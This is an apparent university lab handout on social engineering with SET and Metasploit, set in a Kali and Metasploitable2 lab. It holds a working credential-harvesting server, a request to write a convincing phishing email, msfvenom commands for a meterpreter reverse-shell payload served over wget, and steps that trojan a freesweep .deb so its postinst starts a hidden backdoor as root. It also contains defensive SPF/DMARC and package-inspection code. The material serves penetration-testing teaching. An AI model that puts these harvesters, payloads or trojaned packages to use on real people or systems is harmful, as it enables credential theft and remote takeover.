Lab 8 - Social Engineering
In this lab you are going to perform social engineering activities using the Social-Engineer Toolkit (SET).
"The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly." - https://github.com/trustedsec/social-engineer-toolkit
Note: A key selling point of many SET features is that you can get an attack for testing and demonstration purposes very quickly. Are they believable? Well..... Let's just say additional effort is required to go from script kiddie level to an attack with a real chance of success, and that would be accomplished by other tools (and custom tools), not by using the SET software.
So, with the understanding that SET is more for "fun demos", let's go!
Part 1 - Credential Harvesting via Site Cloner
Run the Social-Engineer Toolkit
$ sudo setoolkit
[SET ASCII-art banner omitted]

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 8.0.3 Codename: 'Maverick' [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs.

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set>
Select the desired mode of operation:
set> 1             # For "Social-Engineering Attacks"
set> 2             # For "Website Attack Vectors"
set:webattack> 3   # For "Credential Harvester Attack"
set:webattack> 2   # For "Site Cloner"
The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
Enter the IP address that you want the stolen credentials to be sent to. The default IP here is probably fine - it's the IP of your Kali box running SET.
Enter the website that you wish to clone
Launch the web browser in Kali and visit your cloned page at
Enter a fake username and password, and confirm that you see those credentials in the SET console.
Note that the cloned website redirects to the real Canvas login page after swiping the credentials.
The user just assumes they entered the wrong login, tries again, and is in Canvas. Will they be suspicious? How many times have you entered a wrong password?
- Upload the XML report that SET produces with all the stolen credentials. You'll need to stop the collection process via CTRL-C.
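What the Site Cloner is doing behind the scenes is small enough to write out. The following is an added example, not SET's code: a loopback-only HTTP server that serves a login form, records whatever is POSTed to it, and answers with a 302 to the "real" login page so the victim's browser lands on the genuine site. The two-field form, the REAL_LOGIN_URL placeholder and the simulated victim are all constructed for the demo; SET clones the real HTML instead of serving a stub.

```python
"""Minimal credential harvester, added here as an example of the mechanism SET's
Site Cloner uses; this is not SET's code. Assumptions: the cloned page is a
constructed two-field form (SET copies the real HTML), REAL_LOGIN_URL is a
placeholder, and the server binds to 127.0.0.1 so the demo is self-contained."""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

REAL_LOGIN_URL = "https://canvas.example.edu/login"   # placeholder, not a real site

# Constructed stand-in for the cloned login page.
CLONED_PAGE = b"""<html><body><form method="POST" action="/login">
<input name="username"><input name="password" type="password">
<input type="submit" value="Log In"></form></body></html>"""

HARVESTED = []   # what SET prints to its console and later writes to its XML report


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the cloned page for any path, like SET's single-page clone.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(CLONED_PAGE)

    def do_POST(self):
        # Record every field posted to the form, then bounce the victim to the
        # real login page so it looks like a mistyped password.
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        HARVESTED.append({k: v[0] for k, v in fields.items()})
        self.send_response(302)
        self.send_header("Location", REAL_LOGIN_URL)
        self.end_headers()

    def log_message(self, *args):   # silence per-request logging in the demo
        pass


def start_harvester(port=0):
    """Start the harvester on a background thread; return (server, bound port)."""
    server = HTTPServer(("127.0.0.1", port), HarvesterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def simulate_victim(port, username, password):
    """Submit the form the way a browser would; return (status, Location header)."""
    body = urllib.parse.urlencode({"username": username, "password": password})
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("POST", "/login", body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    result = (resp.status, resp.getheader("Location"))
    conn.close()
    return result


if __name__ == "__main__":
    server, port = start_harvester()
    print(simulate_victim(port, "student", "hunter2"), HARVESTED)
    server.shutdown()
```

The 302 is the whole trick: the browser follows it silently, the address bar now shows the legitimate site, and the only trace the victim sees is "one failed login". Everything SET adds on top (the copied HTML, the XML report, the IP prompt) is packaging around these two handlers.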
While this is a fun example, the out-of-the-box SET experience is not particularly convincing. There are a number of issues.
- Issue 1: Look at the URL of your cloned site: http://aaa.bbb.ccc.ddd. Is that IP address suitable for a real social engineering attack out across the Internet? Try accessing it from your phone if you're unsure. Why doesn't it work? (See: Background reading)
- Issue 1 (continued): How might you solve the IP address issue in the previous question?
- Issue 2: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd. An ugly IP address. Even 25% of moms would notice that looks suspicious or unusual. How could you remedy this problem?
- Issue 3: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd. HTTP. That's not encrypted. Web browsers are increasingly assertive about labeling such pages as "not secure" with a variety of warning labels or icons. Maybe 15% of moms would notice that. How could you solve this problem? (And, even better, solve this problem for a cost of $0.00?)
Part 2 - Email Blast
Let's say we have the cloned credential harvesting site, and it's doing a credible job masquerading as a legitimate site (after addressing issues 1-3 above with reasonable solutions). How do we get victims (er, client employees who we have explicit written permission to test) to visit our site? Let's send them an email and bait them to click it.
The Social-Engineer Toolkit has a "Mass Mailer" module where it can send out emails of your own design. Actually using this module (or any other mass mailing program) effectively, however, is a challenge. What you would love to do is generate fake emails coming from email@example.com, but you'll quickly run into the same kinds of technological filtering and restrictions used to inhibit spammers.
One such anti-spam technology is Sender Policy Framework (SPF).
- Describe SPF, in your own words. (1 paragraph)
- Using any number of available websites, generate an SPF rule for the domain company.com, specifying that the IP address 188.8.131.52 is allowed to send email for this domain, and also that the host gmail.com is allowed to send email for this domain. Note: There are other more-detailed SPF options. I don't care how you set them.
As an example, here is the SPF rule for one domain:
v=spf1 ip4:184.108.40.206/25 ip4:220.127.116.11 ip4:18.104.22.168 include:spf.protection.outlook.com ....(more hosts).... ~all
Another such anti-spam technology is DomainKeys Identified Mail (DKIM).
- Describe DKIM, in your own words. (1 paragraph)
Finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a third anti-spam technology closely related to the first two.
- Describe DMARC, in your own words. (1 paragraph)
Note that none of these systems are guarantees. The receiver of an email could choose to disregard these systems and deliver a fraudulent message anyway. Or, more likely, the receiver uses information from these systems as data points in a larger anti-spam system that examines the content of the message, the reputation of the server sending the email, the user history in flagging previous messages as spam, and proprietary trade secrets built on decades of experience, when deciding whether to deliver the message to a user inbox. Even new legitimate senders have significant challenges in reliably delivering emails to @gmail.com, @outlook.com, and other large mail services.
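To make the three mechanisms concrete, here is an added example (not SET code, and not a complete RFC 7208/7489 implementation) that evaluates an SPF record for a sender IP and then applies DMARC's identifier-alignment rule on top of it. DNS is replaced by a constructed in-memory table of TXT records using documentation address ranges; only the ip4/ip6/include/all mechanisms are handled, the organizational-domain logic is simplified, and DKIM is not implemented, so the DMARC verdict below rests on the SPF path alone.

```python
"""SPF evaluation plus DMARC identifier alignment, added as an example; it is not
SET code and not a full RFC 7208 / 7489 implementation. DNS is replaced by the
constructed table below (domains and addresses are documentation ranges), only
the ip4/ip6/include/all mechanisms are handled, and the DKIM path of DMARC is
left out, so "dmarc_pass" here means "SPF passed and is aligned"."""
import ipaddress

# Constructed stand-in for DNS TXT records (a real checker queries DNS).
FAKE_DNS_TXT = {
    "company.com": "v=spf1 ip4:203.0.113.0/24 ip4:198.51.100.7 include:mail.example.net ~all",
    "bounce.company.com": "v=spf1 ip4:203.0.113.50 -all",
    "mail.example.net": "v=spf1 ip4:192.0.2.0/28 -all",
    "attacker.example": "v=spf1 ip4:198.51.100.200 -all",
    "_dmarc.company.com": "v=DMARC1; p=reject; adkim=s; aspf=r",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_txt(name):
    return FAKE_DNS_TXT.get(name.lower())


def check_spf(sender_ip, domain, depth=0):
    """Return pass/fail/softfail/neutral/none for sender_ip sending as domain."""
    record = lookup_txt(domain)
    if record is None or not record.startswith("v=spf1") or depth > 10:
        return "none"          # no record, or too many nested includes
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qual = "+"
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        if term.startswith(("ip4:", "ip6:")):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return QUALIFIERS[qual]
        elif term.startswith("include:"):
            # include: matches only if the other domain's record yields "pass"
            if check_spf(sender_ip, term[len("include:"):], depth + 1) == "pass":
                return QUALIFIERS[qual]
        elif term == "all":
            return QUALIFIERS[qual]
        # a, mx, exists, ptr and redirect= need more DNS and are skipped here
    return "neutral"           # RFC 7208 default when nothing matched


def parse_tags(record):
    """Split 'k=v; k=v' style DMARC records into a dict."""
    tags = {}
    for part in (record or "").split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip()] = v.strip()
    return tags


def organizational_domain(name):
    # Simplified: last two labels. Real DMARC uses the Public Suffix List.
    return ".".join(name.lower().split(".")[-2:])


def check_dmarc(sender_ip, mail_from_domain, header_from_domain):
    """DMARC verdict from the SPF path only: SPF must pass *and* the envelope
    (MAIL FROM) domain must align with the visible From: header domain."""
    policy = parse_tags(lookup_txt("_dmarc." + header_from_domain))
    spf_result = check_spf(sender_ip, mail_from_domain)
    if policy.get("aspf", "r") == "s":      # strict: exact match
        aligned = mail_from_domain.lower() == header_from_domain.lower()
    else:                                    # relaxed: same organizational domain
        aligned = organizational_domain(mail_from_domain) == organizational_domain(header_from_domain)
    return {"spf": spf_result, "aligned": aligned,
            "dmarc_pass": spf_result == "pass" and aligned,
            "policy": policy.get("p", "none")}
```

The attacker.example case is the one that matters for the Mass Mailer: a phisher can publish a perfectly valid SPF record for a domain they own and pass SPF on the envelope sender, but the moment the visible From: header says company.com, DMARC alignment fails and the p=reject policy of the spoofed domain applies. That is why forging the From: address of a well-configured domain gets the message dropped rather than delivered.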
Because of these challenges, you'll often see phishing attacks coming from firstname.lastname@example.org, as those are more likely to be delivered. Of course, if you already have some access to the corporate network after earlier pen testing activities, you could send emails out using the legitimate corporate email server. But that's a chicken and egg problem - oftentimes you're using social engineering attacks to gain initial access to the network.
- Using your own personal email, create a high quality phishing email that would plausibly induce a "typical university student" to click on a link and take some action. Send it to yourself to ensure it's correctly formatted. Then, save the email as a .eml or .html file and attach it here. In gmail, the "download message" feature under the ". . ." icon will do this. Other mail clients have an export or save-as feature.
Part 3 - Payloads via msfvenom
Metasploit includes a tool - msfvenom - that can package Metasploit exploits into stand-alone executables that a user can be tricked into running via a social engineering attack.
To see a list of all available payloads, do:
$ msfvenom --list payloads
It's a long list, and the same list of available payloads that Metasploit normally has available to run after an exploit. Just, this time no exploit is needed, since we're using social engineering to trick the user into running the payload.
To see a list of available output formats, CPU architectures, and platforms, do:
$ msfvenom --list formats
$ msfvenom --list archs
$ msfvenom --list platforms
Make an executable that is runnable on our Metasploitable2 VM, a Linux host. That would be the .elf file type. (Windows would be .exe). Pick a payload from the list that works on Linux, and ask msfvenom to package it for you and save it to /tmp/LegitProgram. This payload is hardwired to connect back to the LHOST IP address, which should be Kali's IP:
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
    --arch x86 \
    --format elf \
    --platform linux \
    LHOST=aaa.bbb.ccc.ddd \
    LPORT=5678 \
    > /tmp/LegitProgram
Tip 1: For clarity, this long command was split into multiple lines with the Bash "line continuation" character \. Keep that character in if you enter the multi-line command, or omit it if you enter the command as a single line.
Tip 2: Did your console fill up with "gibberish" when you ran this? Then you didn't correctly redirect the output (using >) to the file /tmp/LegitProgram, and thus msfvenom output the executable file to standard output instead. A quick sanity check is to run the file utility on /tmp/LegitProgram; it should be reported as a 32-bit ELF executable for Intel 80386, matching the --arch and --format you asked for.
Change to the /tmp directory, and start a simple webserver in Kali to host this "LegitProgram" binary. We're using this as a way to get the binary on the target machine since we're in control of both sides, but in reality this would be accomplished through some social engineering attack.
$ cd /tmp
$ python2 -m SimpleHTTPServer 8888     # Built-in webserver in Python 2
# python3 -m http.server 8888          # Alternate command: Built-in webserver in Python 3
Over on your Metasploitable2 VM, download the file from the webserver running in the Kali VM:
$ wget aaa.bbb.ccc.ddd:8888/LegitProgram
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named LegitProgram.1, LegitProgram.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
At this point, you can CTRL-C on the webserver, we don't need it any more. Back in Kali, start the Metasploit database service and console:
$ sudo service postgresql start
$ msfconsole
Use the generic payload handler that provides Metasploit features to exploits run outside of the framework. Configure it for the payload you just downloaded on the target VM, as it needs to know
- What payload is incoming
- What IP the payload is connecting to, and
- What port the payload is connecting to.
msf6> use exploit/multi/handler
msf6> set PAYLOAD linux/x86/meterpreter_reverse_tcp
msf6> set LHOST aaa.bbb.ccc.ddd
msf6> set LPORT 5678
msf6> set ExitOnSession false
Run this service in the background as a job.
msf6> exploit -j
Now, over in the Metasploitable2 VM, run the payload.
$ chmod +x LegitProgram   # Needs to be marked as executable
$ ./LegitProgram
Back in Kali, you should see a notice that a new session was opened.
[*] Meterpreter session 1 opened (172.16.196.2:5678 -> 172.16.196.4:33423) at 2021-02-07 00:20:41 -0800
msf6> sessions --list
msf6> sessions -i X   # where X = number of Meterpreter session
- Submit a screenshot of your Kali msfconsole showing an active meterpreter session
- Submit a screenshot of your Kali meterpreter showing the output of "sysinfo"
- Submit a screenshot of your Metasploitable2 VM console showing the "LegitProgram" running.
In Kali, you can quit the Meterpreter session with the quit command. In addition, you can view the listening handler with jobs and then kill that listener with kill # (where # is the job ID number).
Part 4 - Payload Obfuscation
Rather than coax the user into running a program that is exclusively a back door (which might make them suspicious), what if the backdoor is bundled with some legitimate program? Let's build a Linux installer package (.deb file) for the minesweeper game "freesweep", but include an extra surprise in the bundle.
Based off of this tutorial, but with bugfixes. :) https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/
First, on Kali, download the legitimate .deb file from the package manager. Since we're going to run this on the OLD Metasploitable2 VM (32-bit), let's just grab the correct binary out of the Ubuntu archives. That way, the dynamic library dependencies will work out OK.
$ mkdir -p /tmp/working
$ cd /tmp/working
$ wget http://old-releases.ubuntu.com/ubuntu/pool/universe/f/freesweep/freesweep_0.88-4.3_i386.deb
Second, extract the files into that working directory
$ dpkg -x freesweep_0.88-4.3_i386.deb package
Third, add a DEBIAN directory to hold the package metadata and the maintainer script that launches the "extra surprise" we are including in this package
$ mkdir /tmp/working/package/DEBIAN
In the DEBIAN directory, create a new file called control with the following contents. Note that the continuation lines of the Description field must begin with a single space; dpkg-deb rejects a control file where they don't:
$ nano /tmp/working/package/DEBIAN/control
Package: freesweep
Version: 0.88-4.3
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (email@example.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
In the DEBIAN directory, create a post-installation script called postinst with the following commands that
- Change the permissions of the innocently-named "freesweep_scores" to include the execute flag
- Run the innocently-named "freesweep_scores" in the background, and
- Run the legitimate freesweep program
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores &
/usr/games/freesweep
Two things worth knowing about this script: dpkg runs maintainer scripts as root during dpkg -i, so the sudo is redundant (the backdoor starts as root either way), and mode 2755 sets the setgid bit in addition to rwxr-xr-x, which is also more than the payload needs. Both are inherited from the tutorial this part is based on.
Make this script executable
$ chmod +x /tmp/working/package/DEBIAN/postinst
Now, generate our backdoor program "freesweep_scores":
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
    --arch x86 \
    --format elf \
    --platform linux \
    LHOST=aaa.bbb.ccc.ddd \
    LPORT=5678 \
    --out /tmp/working/package/usr/games/freesweep_scores
Finally, build the new .deb file with the backdoor program:
$ cd /tmp/working/package/DEBIAN
$ dpkg-deb -Zgzip --build /tmp/working/package
# -Zgzip is needed because Metasploitable2 OS is much older than Kali's, and
# package manager doesn't know how to uncompress newer .deb files
Rename the output back into the original freesweep.deb file name (no one suspects a thing!), and move it to /tmp:
$ mv /tmp/working/package.deb /tmp/freesweep.deb
$ cd /tmp
As you did in the previous section: Run the web server and copy the new freesweep.deb to your Metasploitable2 VM with wget.
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named freesweep.deb.1, freesweep.deb.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
As you did in the previous section: Run Metasploit and launch the exploit/multi/handler with the correct options to listen for an incoming connection. Or, if msfconsole is still active, the handler may still be running.
On the Metasploitable2 VM, install this super fun game your friend sent you!
$ sudo dpkg -i freesweep.deb
# Oh look, the game started automatically!
# Let's play, this looks fun!
On Kali, view the active sessions
msf6> sessions --list
msf6> sessions -i x
meterpreter> sysinfo
Did something go wrong in your steps? To clear out metasploitable2 and start again:
$ sudo apt-get remove freesweep
$ rm freesweep.deb
# And download a fixed .deb file and try installing it again
You can verify that your copy of freesweep.deb contains your backdoor program with dpkg -c freesweep.deb.
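The dpkg -c listing and the md5 questions below only look at the outside of the package. The following added example (not dpkg, SET or Metasploit code) opens a .deb the way dpkg does, as an ar archive wrapping control.tar.gz and data.tar.gz, and reports what a reviewer of an incoming package would actually want: the file list, the maintainer scripts, which shipped files DEBIAN/postinst references, which files are 32-bit x86 ELF binaries (the kind the msfvenom command in Part 3 and Part 4 produces, which also answers Tip 2's "is this really the executable I asked for?"), and the md5 of the whole package. The packages it inspects are constructed in memory with the lab's layout; the "ELF binaries" are header bytes only, not real payloads, and the maintainer address is made up.

```python
"""Offline .deb inspector, added as an example; it is not dpkg or Metasploit code.
It does what 'dpkg -c' and md5sum do in this lab, plus two checks a reviewer would
want: which shipped files DEBIAN/postinst references, and which files are 32-bit
x86 ELF binaries (the kind 'msfvenom --arch x86 --format elf' writes). The
packages it inspects are constructed in memory with the lab's layout; the ELF
payloads are fake headers, not real code, and the maintainer address is made up."""
import gzip
import hashlib
import io
import struct
import tarfile

AR_MAGIC = b"!<arch>\n"


def ar_members(blob):
    """Parse the outer 'ar' archive of a .deb into {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos, members = len(AR_MAGIC), {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                       # fixed 60-byte member header
        name = hdr[0:16].decode().strip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                  # members padded to even length
    return members


def ar_pack(members):
    """Inverse of ar_members, used only to construct the sample packages."""
    out = bytearray(AR_MAGIC)
    for name, data in members:
        hdr = (name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
               + "100644".ljust(8) + str(len(data)).ljust(10) + "`\n")
        out += hdr.encode() + data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


def make_tar(entries):
    """entries: (path, bytes, mode). Returns a gzip'ed tar with mtime 0 (reproducible)."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=0) as gz, \
            tarfile.open(fileobj=gz, mode="w") as tar:
        for path, data, mode in entries:
            info = tarfile.TarInfo(path)
            info.size, info.mode = len(data), mode
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def tar_files(blob):
    """Return {path without leading './': bytes} for regular files in a tar blob."""
    files = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.isfile():
                name = m.name[2:] if m.name.startswith("./") else m.name
                files[name] = tar.extractfile(m).read()
    return files


def fake_elf32_i386():
    """ELF header bytes only: magic, EI_CLASS=1 (32-bit), EI_DATA=1 (LE), e_machine=3 (i386)."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    return e_ident + struct.pack("<HH", 2, 3) + b"\x00" * 36


def is_elf32_i386(data):
    return (len(data) >= 20 and data[:4] == b"\x7fELF" and data[4] == 1
            and struct.unpack_from("<H", data, 18)[0] == 3)


CONTROL = (b"Package: freesweep\nVersion: 0.88-4.3\nArchitecture: i386\n"
           b"Maintainer: Nobody <nobody@example.invalid>\nDescription: a text-based minesweeper\n")
POSTINST = (b"#!/bin/sh\nchmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores &\n"
            b"/usr/games/freesweep\n")


def build_sample_deb(trojan):
    """Constructed package: plain freesweep, or the lab's version with the extra binary."""
    control = [("./control", CONTROL, 0o644)]
    data = [("./usr/games/freesweep", fake_elf32_i386(), 0o755),
            ("./usr/share/doc/freesweep/copyright", b"GPL\n", 0o644)]
    if trojan:
        control.append(("./postinst", POSTINST, 0o755))
        data.append(("./usr/games/freesweep_scores", fake_elf32_i386(), 0o644))
    return ar_pack([("debian-binary", b"2.0\n"),
                    ("control.tar.gz", make_tar(control)),
                    ("data.tar.gz", make_tar(data))])


def inspect_deb(blob):
    """Summarise a .deb: md5, file list, maintainer scripts, what postinst runs, ELF binaries."""
    members = ar_members(blob)
    control_tar = next(v for k, v in members.items() if k.startswith("control.tar"))
    data_tar = next(v for k, v in members.items() if k.startswith("data.tar"))
    control = tar_files(control_tar)
    data = {"/" + k: v for k, v in tar_files(data_tar).items()}
    postinst = control.get("postinst", b"").decode(errors="replace")
    return {
        "md5": hashlib.md5(blob).hexdigest(),
        "files": sorted(data),
        "maintainer_scripts": sorted(k for k in control if k != "control"),
        "postinst_references": sorted(p for p in data if p in postinst),
        "elf_i386": sorted(p for p, b in data.items() if is_elf32_i386(b)),
    }


if __name__ == "__main__":
    for label, trojan in (("original", False), ("trojaned", True)):
        print(label, inspect_deb(build_sample_deb(trojan)))
```

Run against a real freesweep.deb (read the file into blob and call inspect_deb) the same function shows the difference the md5 questions below are getting at: the original package has no maintainer scripts and one ELF in /usr/games, while the rebuilt one has a postinst that references a second ELF, and the two checksums differ. Hashing is only useful when you have a known-good value to compare against, which is exactly what a package repository's signed index provides and a file "your friend sent you" does not.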
- Submit a screenshot of Metasploitable2 showing the game running
- Submit a screenshot of Kali showing the active meterpreter session
- What is the md5 checksum of the original freesweep .deb file downloaded from the repository? Use the
- What is the md5 checksum of the modified freesweep.deb file that also includes the backdoor program "freesweep_scores"? Use the